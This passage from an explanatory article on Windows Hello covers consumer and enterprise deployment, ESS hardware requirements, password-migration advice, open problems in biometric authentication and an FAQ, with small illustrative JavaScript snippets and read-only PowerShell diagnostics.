For consumers, the simplest path is built into Windows: open Settings > Accounts > Sign-in options, create a Windows Hello PIN first, then enroll face or fingerprint if the hardware is present [@ms-whfb]. If Windows only offers PIN, the machine lacks a compatible biometric sensor. On a laptop with an IR camera or certified fingerprint reader, enrollment takes a few minutes and the credential becomes device-bound immediately.

For enterprises, Microsoft now recommends starting with Cloud Trust unless certificate-based authentication is a hard requirement. A practical rollout checklist is short: confirm devices are Entra joined or hybrid joined, deploy Microsoft Entra Kerberos, verify Windows 10 21H2+/Windows 11 clients and Windows Server 2016+ read-write domain controllers in each site, then push the "Use Windows Hello for Business" and "Use cloud trust for on-premises authentication" policies through Intune or Group Policy [@ms-cloud-trust-ga]. That is dramatically lighter than standing up PKI, AD FS, and certificate templates.

ESS deserves its own hardware check. A TPM alone is not enough: ESS depends on Windows 11, VBS-capable hardware, and compatible secure biometric sensors [@ms-ess]. Unsupported systems can still use Hello, but they fall back to the older software-protected biometric path. Hardware inventory determines whether you are getting the modern threat model or merely the old UX.
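The three ESS prerequisites named above lend themselves to a simple inventory pass. The sketch below is one way to express that, assuming a hypothetical inventory record with the boolean fields `windows11`, `vbsCapable`, and `secureBiometricSensor`; none of these names come from a Microsoft API, and how you populate them depends on your own asset tooling.

```javascript
// Hypothetical classifier: field names are illustrative, not from any real API.
// A device qualifies for ESS only when all three prerequisites are present;
// otherwise it can still use Hello on the older, pre-ESS path.
function classifyHelloTier(device) {
  const missing = [];
  if (!device.windows11) missing.push("Windows 11");
  if (!device.vbsCapable) missing.push("VBS-capable hardware");
  if (!device.secureBiometricSensor) missing.push("ESS-compatible sensor");
  return missing.length === 0
    ? { tier: "ESS", missing }
    : { tier: "Hello without ESS", missing };
}

// Made-up fleet data for illustration.
const fleet = [
  { name: "new-laptop", hasTpm: true, windows11: true, vbsCapable: true, secureBiometricSensor: true },
  { name: "old-desktop", hasTpm: true, windows11: false, vbsCapable: true, secureBiometricSensor: false },
];

for (const device of fleet) {
  const result = classifyHelloTier(device);
  console.log(device.name, result.tier, result.missing.join(", "));
}
```

Note that `hasTpm` is carried in the record but never consulted: a TPM alone does not move a device into the ESS tier.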

Note: Start with a pilot group, require a Hello PIN for every enrolled user, and issue at least one backup FIDO2 security key to admins and help-desk staff. The cleanest password migration is additive: enroll Hello first, prove recovery works, then remove password prompts from the highest-value workflows last.

For password migration, avoid a flag day. Keep passwords as break-glass recovery while you move device sign-in, Microsoft 365, VPN, and high-value internal apps onto Hello or passkeys first [@ms-entra-passwordless]. Measure enrollment completion, recovery success, and hardware exceptions. Once those numbers stabilize, tighten Conditional Access so phishing-resistant credentials satisfy MFA and passwords become the fallback of last resort.

After 64 years, the password is finally losing its grip. But the story of Windows Hello is not a triumph -- it is a lesson in the limits of security engineering.

The Limits: What Remains Unsolved

Biometrics fail in a way passwords do not: they are hard to rotate.

You cannot change your face. This single fact defines the deepest unsolved problem in biometric authentication.

Passwords can be rotated. Security keys can be replaced. But you have one face, ten fingerprints, and two irises. If a biometric template is compromised, there is no "reset" button.

Cancelable biometrics: a technique for generating revocable biometric templates by applying non-invertible mathematical transformations to the original biometric data. If a transformed template is compromised, a new transformation can be applied to create a fresh template from the same biometric trait. In theory, this solves the irrevocability problem. In practice, the trade-off between non-invertibility and matching accuracy remains unresolved.
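To make the revocable-template idea concrete, here is a toy sketch in the spirit of random-projection schemes such as BioHashing. It projects a feature vector onto directions derived from a replaceable key and keeps only the sign of each projection. The function names, the 8-element feature vector, and the key values are all made up for illustration, and the code makes no security claim; real schemes have to handle noise tolerance and inversion attacks that this ignores.

```javascript
// Small deterministic PRNG (mulberry32) so the same key always yields
// the same sequence of projection directions.
function mulberry32(seed) {
  let a = seed >>> 0;
  return function next() {
    a = (a + 0x6d2b79f5) >>> 0;
    let t = a;
    t = Math.imul(t ^ (t >>> 15), t | 1);
    t ^= t + Math.imul(t ^ (t >>> 7), t | 61);
    return ((t ^ (t >>> 14)) >>> 0) / 4294967296;
  };
}

// Toy cancelable template: one bit per key-derived random direction,
// set from the sign of the projection. Magnitudes are discarded (lossy).
function cancelableTemplate(features, key, bits = 64) {
  const rand = mulberry32(key);
  const out = [];
  for (let b = 0; b < bits; b++) {
    let dot = 0;
    for (const f of features) dot += f * (rand() * 2 - 1);
    out.push(dot >= 0 ? 1 : 0);
  }
  return out.join("");
}

// Number of differing bit positions between two equal-length templates.
function hamming(a, b) {
  let d = 0;
  for (let i = 0; i < a.length; i++) if (a[i] !== b[i]) d++;
  return d;
}

const face = [0.12, -0.8, 0.33, 0.91, -0.45, 0.07, 0.58, -0.29]; // made-up features
const enrolled = cancelableTemplate(face, 1001);
const reissued = cancelableTemplate(face, 2002); // "revoked" and re-enrolled under a new key

console.log("same key, distance:", hamming(enrolled, cancelableTemplate(face, 1001)));
console.log("new key, distance:", hamming(enrolled, reissued));
```

The same trait under the same key reproduces the enrolled template, while issuing a new key yields an unrelated bit string from the same face. That is the "reset button" the raw biometric lacks.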

The biometric floor

The theoretical limit on biometric authentication error is the Bayes error rate [@jain-biometric] -- the minimum achievable error when the genuine-user and impostor score distributions overlap. Information theory bounds the error probability from below through Fano's inequality:

$$P_e \geq \frac{H(X|Y) - 1}{\log_2 |X|}$$

where $P_e$ is the probability of error, $H(X|Y)$ is the conditional entropy (in bits) of identity given the biometric sample, and $|X|$ is the number of possible identities. Current systems achieve a FAR of $10^{-5}$ to $10^{-6}$, but the theoretical minimum [@jain-biometric] -- given perfect sensors and optimal classifiers -- could be orders of magnitude lower. The practical gap is driven by sensor noise, environmental variability, and aging of biometric features.
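A small calculator makes the bound easier to get a feel for. The sketch below assumes entropies are measured in bits (so the logarithm is base 2) and clamps the result at zero, since a negative lower bound says nothing. The function name `fanoLowerBound` and the sample inputs are illustrative, not measurements from any real system.

```javascript
// Fano lower bound on the identification error probability.
// conditionalEntropyBits: H(X|Y) in bits; numIdentities: |X|.
function fanoLowerBound(conditionalEntropyBits, numIdentities) {
  if (numIdentities < 2) {
    throw new RangeError("need at least two possible identities");
  }
  const bound = (conditionalEntropyBits - 1) / Math.log2(numIdentities);
  return Math.max(0, bound); // a negative bound is vacuous, so report 0
}

// Illustrative inputs: 1024 identities, varying residual uncertainty.
console.log(fanoLowerBound(6, 1024));   // (6 - 1) / log2(1024) = 5 / 10
console.log(fanoLowerBound(0.5, 1024)); // under 1 bit of uncertainty: bound is 0
```

The second call shows why the bound only bites when the sample leaves more than one bit of uncertainty about identity. A sharp sensor drives $H(X|Y)$ toward zero, and the floor on error goes with it.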

Six open problems

1. Cross-platform credential portability. Synced passkeys are currently locked to their vendor's credential manager: a passkey in iCloud Keychain does not transfer to Google Password Manager. The FIDO Alliance published draft Credential Exchange Protocol (CXP) and Credential Exchange Format (CXF) specifications [@fido-cxp] in late 2024 for encrypted credential exchange, but full cross-vendor interoperability is not expected before late 2026.

2. The adversarial ML arms race. Generative AI can create increasingly convincing biometric spoofs -- the Red Bleed attack [@red-bleed] used a VAE to convert RGB photos to NIR facial videos. Discriminative AI tries to detect these spoofs. This is an open-ended arms race with no known endpoint.

3. Account recovery. When all biometric and device-based credentials fail, how does a user recover their account? Most services fall back to email or SMS [@ms-entra-passwordless] -- reintroducing the very phishable factors they were designed to eliminate. Recovery codes are functionally passwords.

Note: Systems that fall back to passwords or SMS for account recovery reintroduce the very vulnerabilities they were designed to eliminate. A truly passwordless system needs passwordless recovery -- and no universal solution exists yet.

4. The quantum threat. Shor's algorithm [@nist-pqc] on a sufficiently large quantum computer would break all ECDSA and RSA authentication -- including every FIDO2 credential in existence. NIST finalized post-quantum standards [@nist-pqc] (ML-DSA, SLH-DSA, ML-KEM) in 2024, but no FIDO2 authenticator ships with post-quantum support as of 2026.

Most deployed FIDO2/WebAuthn credentials use ECDSA P-256 (ES256), which provides roughly 128-bit classical security. Breaking a single credential requires approximately $2^{128}$ operations -- far beyond any existing computer.

Shor's algorithm changes this equation. A cryptographically relevant quantum computer could solve the elliptic curve discrete logarithm problem in polynomial time, breaking ECDSA entirely. No such computer exists today. The "harvest now, decrypt later" threat applies most directly to encrypted data, but signatures face an analogous risk: an adversary who collects public keys and signed assertions now could recover the private keys later and forge assertions for any credential still in use.

NIST finalized its first post-quantum cryptography standards in 2024 [@nist-pqc]: ML-DSA (formerly CRYSTALS-Dilithium) for signatures, ML-KEM (formerly CRYSTALS-Kyber) for key encapsulation, and SLH-DSA (formerly SPHINCS+) for hash-based signatures. The FIDO Alliance and W3C are exploring hybrid signature schemes that combine classical ECDSA with post-quantum algorithms, but no timeline for standardization has been published.

5. The ESS hardware gap. ESS requires specific secure sensors and VBS-capable CPUs [@ms-ess]. Many enterprise PCs -- particularly those shipped without an ESS-certified built-in biometric sensor, including many AMD-based and older Intel-based machines -- lack ESS capability. On these devices, Windows Hello falls back to the pre-ESS security model, leaving them vulnerable to attacks like Faceplant.

6. Accessibility and inclusion. Biometric authentication creates barriers for people with facial differences, missing fingers, or conditions that affect biometric stability. A passwordless future must ensure that non-biometric alternatives (PINs, hardware keys) remain first-class options, not afterthoughts. Behavioral biometrics -- keystroke dynamics, gait analysis, continuous session verification -- represent an emerging parallel path that may expand authentication options beyond traditional biometric modalities.
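For the quantum-threat item above, the $2^{128}$ classical work factor can be put in perspective with a few lines of integer arithmetic. The rate of $10^{18}$ operations per second is an assumption chosen to represent an exascale-class machine, and treating each guess as one "operation" is a simplification, so read the result as an order of magnitude only.

```javascript
// Rough time to perform 2^128 operations at an ASSUMED rate.
const operations = 2n ** 128n;
const opsPerSecond = 10n ** 18n;    // assumption: exascale-class throughput
const secondsPerYear = 31_557_600n; // Julian year (365.25 days)

// BigInt division truncates, which is fine at this scale.
const years = operations / (opsPerSecond * secondsPerYear);

console.log(`about ${years.toString().length}-digit number of years: ${years}`);
console.log("more than a trillion years:", years > 10n ** 12n);
```

Even under that generous assumption the classical attack takes on the order of ten trillion years, which is why the realistic risk to ECDSA comes from Shor's algorithm and not from faster conventional hardware.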

To check whether a device meets the VBS prerequisite for ESS, open PowerShell as administrator and run:

Get-CimInstance -Namespace root/Microsoft/Windows/DeviceGuard -ClassName Win32_DeviceGuard | Select-Object VirtualizationBasedSecurityStatus

A value of 2 means VBS is running. Then check the biometric service:

Get-WinEvent -LogName Microsoft-Windows-Biometrics/Operational -MaxEvents 10 | Format-List

Look for events indicating ESS-protected biometric operations. If your device lacks ESS, consider disabling biometric sign-in on sensitive accounts and using FIDO2 hardware keys instead.

Key idea: Biometric traits are permanent and finite. Unlike passwords, they cannot be changed if compromised. This irrevocability is the deepest unsolved challenge in passwordless authentication -- and no amount of better sensors or smarter algorithms can change the fact that you have one face, ten fingerprints, and two irises.

The theoretically ideal system would combine zero-knowledge biometric verification, post-quantum cryptographic authentication, hardware-attested revocable credentials, and cross-platform portability. None of this exists yet.

The password's 64-year reign is ending, but its replacement is still under construction. Every generation of authentication solved one problem and revealed a deeper one. The question is not whether passwordless authentication will win -- it is whether we can build it before the attackers catch up.

Frequently Asked Questions

Does Windows Hello send my biometric data to Microsoft?

No. Biometric data never leaves the device. During enrollment, your face or fingerprint template is stored locally, protected by the operating system (and by VBS on ESS-enabled devices). Only a public key is registered with the identity provider (Azure AD / Entra ID) [@ms-whfb]. Microsoft's servers never receive, store, or process your biometric data.

Can a photo fool Windows Hello face recognition?

Standard photos cannot. Windows Hello uses near-infrared cameras [@ms-biometric-reqs] with anti-spoofing algorithms that distinguish between live faces and flat images. However, researchers have demonstrated advanced attacks: CVE-2021-34466 [@cyberark-bypass] used a custom USB device emulating an IR camera, and the Red Bleed attack [@red-bleed] used a custom NIR-emitting LCD display. Both have been patched, but the arms race continues.

Is a Windows Hello PIN less secure than a password?

No -- it is more secure. A Windows Hello PIN is device-bound [@ms-whfb]: it unlocks a TPM-stored private key on that specific hardware. A stolen PIN is useless without physical access to the device. A password, by contrast, works from any device on earth and can be phished, reused, or leaked in a breach.

What is the difference between Windows Hello and Windows Hello for Business?

Consumer Windows Hello [@ms-whfb] ties authentication to a personal Microsoft account. Windows Hello for Business integrates with Azure AD / Entra ID with enterprise management capabilities: conditional access policies, Intune deployment, multiple trust models (cloud, key, certificate), and group policy controls. They share the same biometric and TPM technology but have different management and security models.

Do passkeys replace Windows Hello?

No. Passkeys build on Hello's foundation. Windows Hello acts as the platform authenticator for FIDO2 passkeys [@fido-how] on Windows -- your biometric gesture unlocks the passkey stored in the TPM. Passkeys extend Hello's model to cross-platform and cross-service authentication via the WebAuthn standard [@webauthn-3].

What happens if I lose my device?

With device-bound credentials (traditional Windows Hello), you re-enroll on the new device using your Microsoft or organizational account. With synced passkeys, credentials restore from your credential manager -- iCloud Keychain [@apple-passkeys-security] for Apple, Google Password Manager [@google-passkeys] for Android/Chrome. Registering a FIDO2 hardware security key [@fido-specs] as a backup authenticator is strongly recommended.

Will Windows Hello remain secure against quantum computers?

Not indefinitely. The asymmetric cryptography underlying Hello and FIDO2 (ECDSA P-256) is theoretically vulnerable [@nist-pqc] to quantum computers running Shor's algorithm. No quantum computer can break it today, and the timeline for cryptographically relevant quantum computers remains uncertain. NIST finalized post-quantum cryptography standards in 2024, but no FIDO2 authenticator ships with post-quantum support yet. Migration planning should begin now.